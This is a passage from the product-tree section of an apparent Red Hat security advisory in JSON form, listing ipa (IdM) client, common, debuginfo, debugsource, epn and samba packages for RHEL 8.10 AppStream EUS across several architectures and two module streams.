"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-0:4.9.13-9.module+el8.10.0+21691+df63127d.src::idm:DL1"
},
"product_reference": "ipa-0:4.9.13-9.module+el8.10.0+21691+df63127d.src::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.src (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.src::idm:client"
},
"product_reference": "ipa-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.src::idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1"
},
"product_reference": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1"
},
"product_reference": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1"
},
"product_reference": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1"
},
"product_reference": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64 (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client"
},
"product_reference": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client"
},
"product_reference": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client"
},
"product_reference": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64 (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client"
},
"product_reference": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1"
},
"product_reference": "ipa-client-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client"
},
"product_reference": "ipa-client-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1"
},
"product_reference": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1"
},
"product_reference": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1"
},
"product_reference": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1"
},
"product_reference": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64 (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client"
},
"product_reference": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client"
},
"product_reference": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client"
},
"product_reference": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64 (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client"
},
"product_reference": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1"
},
"product_reference": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1"
},
"product_reference": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1"
},
"product_reference": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1"
},
"product_reference": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64 (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client"
},
"product_reference": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client"
},
"product_reference": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client"
},
"product_reference": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64 (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client"
},
"product_reference": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1"
},
"product_reference": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1"
},
"product_reference": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1"
},
"product_reference": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1"
},
"product_reference": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64 (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client"
},
"product_reference": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client"
},
"product_reference": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client"
},
"product_reference": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64 (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client"
},
"product_reference": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1"
},
"product_reference": "ipa-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client"
},
"product_reference": "ipa-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1"
},
"product_reference": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1"
},
"product_reference": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1"
},
"product_reference": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1"
},
"product_reference": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64 (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client"
},
"product_reference": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client"
},
"product_reference": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client"
},
"product_reference": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64 (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client"
},
"product_reference": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1"
},
"product_reference": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1"
},
"product_reference": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1"
},
"product_reference": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1"
},
"product_reference": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64 (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client"
},
"product_reference": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client"
},
"product_reference": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client"
},
"product_reference": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64 (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client"
},
"product_reference": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.noarch (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
